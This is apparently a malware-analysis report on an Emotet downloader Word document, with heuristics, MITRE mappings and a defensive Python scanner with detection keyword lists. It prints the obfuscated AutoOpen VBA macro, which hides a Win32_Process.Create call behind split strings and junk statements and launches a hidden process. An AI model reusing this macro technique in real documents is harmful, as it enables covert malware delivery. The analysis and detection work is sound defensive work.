Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
The sample is flagged as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-10001946-0', which points to the Emotet family. Heuristics report an AutoOpen VBA macro that uses CreateObject, a common way of fetching and running a secondary payload. The extracted source bears this out: autoopen calls jb3mD6, which builds a WMI moniker as "win" + "mgmts:Win32_Process" (split to defeat simple string matching), resolves it through the helper H9CmrEoJ (not included in the truncated preview), and invokes Win32_Process.Create with a command line assembled from three ComboBox controls on the document (n00dj7, tALCDFW and rn51tfI, declared by the VB_Control attributes). A second helper, jY2bi1wA, builds a Win32_ProcessStartup object and sets its ShowWindow property from two uninitialised variables, which evaluates to 0 (SW_HIDE), so the child process starts without a visible window. The Debug.Print statements with random string concatenations are padding inserted to obfuscate the code. No download URL or execution command was extracted because the command line is stored in the property data of the form controls rather than in the macro source; recover it from the VBA project's form storage (the designer streams, which oletools' oleform module parses) before attributing a specific downloader stage.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat: a VBA project was in fact recovered from this sample (see the extracted macros.bas below), so treat this finding as an overlapping signal for the same AutoOpen surface rather than as independent evidence.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML schema namespace URI that ordinary Office documents carry, not a host the macro contacts.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5039 bytes |

SHA-256 (macros.bas): 7380e6ff79b2e3f94e97eec6f704d92a235e589c48692cb2053ec16805f8730a
Preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "rn51tfI, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "n00dj7, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "tALCDFW, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
Debug.Print "DNRSQrh" + ("qnU1I8") + "Y9973miC" + "jXJXFjM" + "wNT28EGT" + ("DZjsdj" + ("WMlzPvP3"))
Debug.Print "WhwnPKhl" + ("A3wSZz") + "Gprznk" + "JJ0ilFmH" + ("WbJYL3Z" + "dbTYcUMu")
jb3mD6
Debug.Print "iqSGnGY" + ("V1JMJaT") + "inap3i_N" + "FUjWDAm5" + "IIYuY5" + ("S85_rm4k" + ("pzHZriAQ"))
Debug.Print "FLhhBAh" + ("jQ9hP3") + "Fo5iiw" + "YLvc6t" + ("ZoKZX0qF" + "bp2S3iN")
End Sub
Attribute VB_Name = "buImUJ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "EBJqFb3N"
Attribute VB_Name = "zfZDRIE_"
Attribute VB_Name = "Aaf02TQd"
Attribute VB_Name = "VA5PmZ"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "KNBt8zfD"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "NzadOpO"
Function jb3mD6()
sUZBjj4 = ThisDocument.n00dj7 + ThisDocument.tALCDFW + ThisDocument.rn51tfI
Debug.Print "aKj50Q" + ("tMB_5i") + "mmpWrdC" + "E3lczo1P" + "aNtwkJU" + ("LdQEitVQ" + ("RDIcM5Z"))
Debug.Print "EjLuj9R" + ("rEMXhO") + "qzCucY" + "AhXwh3Lu" + ("MCtsGRdU" + "H0j5h8E")
FoE1wmh = "win"
Debug.Print "L5GjaaQ" + ("QFud7q") + "AYTTjaDs" + "dJ2owUt" + "ooQ0s7" + ("flW00z" + ("LQMsiCzO"))
Debug.Print "mUqUauEY" + ("nalXONc") + "fkX4tiDh" + "l1BIAL9j" + ("j5l6nK" + "qdQlsZO")
nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process"
Debug.Print "VC0jQC" + ("FXtXvJp") + "m9sIGNVE" + "kXaZu6VJ" + "us_vuVKV" + ("VzlZwLM" + ("robwET"))
Debug.Print "w0da_LU6" + ("wYwD_zEj") + "AnjsS2oL" + "vbupMXzA" + ("NfuNQoh" + "fsfZNpV")
H9CmrEoJ(nDVvoKb4).Create# sUZBjj4, HiJcFC, jY2bi1wA, F2mCDIU
Debug.Print "ZQKqq57" + ("iC8z3a") + "WcXjbzhS" + "wXhifz" + "J6pz7vF" + ("ijVPkw" + ("V54DdnY1"))
Debug.Print "HvGiIf" + ("zBohma") + "zwfEWmK" + "vamtRQ" + ("m9kJCY1" + "oUF4Sd8")
End Function
Attribute VB_Name = "RfohkVc"
Function jY2bi1wA()
Debug.Print "wuGGCT" + ("aiUN7k") + "OQiN9OM1" + "TcuRIUlm" + "wdWZo0" + ("WAt5c8" + ("nXLshQp"))
Debug.Print "QSOa_nTE" + ("q5Fk_TLZ") + "Z_z1tj" + "pjswSdU" + ("fbXa1XLn" + "pMYW3Ozc")
FoE1wmh = "win"
Debug.Print "wn3UNdJ" + ("GVq8ES") + "YlT25Wob" + "YNTQFai" + "kh5JvcRv" + ("zGrs6a" + ("jEQN4S"))
Debug.Print "T93PQdEY" + ("dciYnm") + "wRzfY2f" + "woiomEFE" + ("I1iCSUq2" + "Pcp_hTz")
nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process" + "Startup"
Debug.Print "BaaMpwbi" + ("MGk3pr") + "wzoGjZi" + "dGiqzj" + "zZmOw0lO" + ("ujERUJOc" + ("v2AsTt"))
Debug.Print "JbalrBp" + ("FKzD46") + "p0SzVcW" + "vIY67CG" + ("KhS3Cm" + "GSFKC8")
Set jY2bi1wA = H9CmrEoJ(nDVvoKb4)
Debug.Print "rkpAdhOU" + ("n1LMmid") + "BknUY6" + "i9NB1f" + "jjc1TrzD" + ("RMIlvJ" + ("nUMPRFV"))
Debug.Print "S3T7Uja" + ("BKwVwkuN") + "CEMDPTuS" + "OWf9IaM" + ("Aotm1I" + "WhnfEjZT")
With jY2bi1wA
Debug.Print "o4bCRj" + ("WzjKjHAQ") + "vbdLcq" + "ft1H60" + "YfzkJ3B" + ("iYwoCOwz" + ("cjlbva"))
Debug.Print "H5T6kj8o" + ("mBDaLbw") + "YjiDUIzF" + "DBK084Xc" + ("NrYuSCvI" + "IncjsWp")
. _
ShowWindow = pa4wacjC + p0Df
... (truncated)
```
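The listing above hides its intent behind three tricks: line continuations that split `Sub autoopen()` over several lines, junk `Debug.Print` statements, and string splitting so that `winmgmts:Win32_Process` never appears as one literal. The following Python scanner is an added example written for this page (it is not part of the analyzer's code or of oletools) and shows how a source-level triage tool can undo those three tricks and apply the same auto-exec plus execution-token rule that OLE_VBA_PCODE_AUTOEXEC_EXEC applies to p-code. The keyword lists are hypothetical subsets chosen for the example, and the embedded macro excerpt is copied from the preview above with most padding lines removed. It also makes the report's gap explicit: the three `ThisDocument.*` reads are form-control values that do not exist in the module source, so the command line cannot be recovered from this artifact alone.

```python
import re

# Constructed input: an excerpt of the macro source shown in the preview
# above (most Debug.Print padding omitted). This is the sample's own
# obfuscated VBA, embedded here only as test input for the scanner.
MACRO_SRC = '''Sub _
autoopen( _
)
Debug.Print "DNRSQrh" + ("qnU1I8") + "Y9973miC"
jb3mD6
End Sub
Function jb3mD6()
sUZBjj4 = ThisDocument.n00dj7 + ThisDocument.tALCDFW + ThisDocument.rn51tfI
FoE1wmh = "win"
nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process"
H9CmrEoJ(nDVvoKb4).Create# sUZBjj4, HiJcFC, jY2bi1wA, F2mCDIU
End Function
Function jY2bi1wA()
FoE1wmh = "win"
nDVvoKb4 = FoE1wmh + "mgmts:Win32_Process" + "Startup"
Set jY2bi1wA = H9CmrEoJ(nDVvoKb4)
With jY2bi1wA
. _
ShowWindow = pa4wacjC + p0Df
End With
End Function
'''

# Hypothetical keyword lists for this example (a subset of what a real
# scanner such as olevba covers): auto-execution entry points and tokens
# that indicate process/object execution.
AUTOEXEC = re.compile(r'\b(AutoOpen|Auto_Open|Document_Open|AutoExec|AutoClose|Workbook_Open)\b', re.I)
EXEC_TOKENS = re.compile(r'(winmgmts|Win32_Process|\.Create\b|CreateObject|GetObject|WScript\.Shell|\bShell\b|ShowWindow)', re.I)
LITERAL = re.compile(r'"([^"]*)"')
ASSIGN = re.compile(r'\s*(?:Set\s+)?(\w+)\s*=\s*(.+)$')


def join_continuations(src):
    """Rejoin statements split with VBA's ' _' line continuation
    (the sample splits 'Sub autoopen()' over three lines this way)."""
    return re.sub(r'[ \t]_\r?\n\s*', ' ', src)


def strip_junk(lines):
    """Drop Debug.Print statements; in this sample they are padding only."""
    return [ln for ln in lines if not ln.strip().lower().startswith('debug.print')]


def resolve_strings(lines):
    """Constant-fold 'var = literal + var + literal' assignments so that
    split strings such as "win" + "mgmts:Win32_Process" become readable.
    Returns a list of (var, value) for every assignment that fully resolves."""
    env, resolved = {}, []
    for ln in lines:
        m = ASSIGN.match(ln)
        if not m:
            continue
        var, expr = m.group(1), m.group(2)
        value, ok = '', True
        for part in expr.split('+'):
            part = part.strip().strip('()')
            lit = LITERAL.fullmatch(part)
            if lit:
                value += lit.group(1)
            elif part in env:
                value += env[part]
            else:  # e.g. ThisDocument.n00dj7: the value lives outside the source
                ok = False
                break
        if ok:
            env[var] = value
            resolved.append((var, value))
    return resolved


def analyze(src):
    """Deobfuscate the source and collect the evidence a triage rule needs."""
    src = join_continuations(src)
    lines = strip_junk(src.splitlines())
    text = '\n'.join(lines)
    resolved = resolve_strings(lines)
    folded = '\n'.join(v for _, v in resolved)
    return {
        'autoexec': sorted({m.group(1).lower() for m in AUTOEXEC.finditer(text)}),
        'strings': resolved,
        # tokens in the raw source plus those only visible after folding
        'exec_tokens': sorted({m.group(1).lower()
                               for m in EXEC_TOKENS.finditer(text + '\n' + folded)}),
        # form-control reads: their values are stored in the VBA form storage,
        # not in the module source, so they cannot be resolved here
        'form_controls': sorted({m.group(1) for m in re.finditer(r'ThisDocument\.(\w+)', text)}),
    }


def verdict(report):
    """Source-level mirror of the auto-exec + execution-token rule."""
    return bool(report['autoexec']) and bool(report['exec_tokens'])


if __name__ == '__main__':
    rep = analyze(MACRO_SRC)
    for key, val in rep.items():
        print(key, val)
    print('suspicious:', verdict(rep))
```

Running it on the excerpt reports `autoopen` as the entry point, folds `nDVvoKb4` to `winmgmts:Win32_Process` and `winmgmts:Win32_ProcessStartup`, and lists `n00dj7`, `rn51tfI` and `tALCDFW` as unresolved form-control reads; that last list is the pointer to where the actual command line must be recovered from.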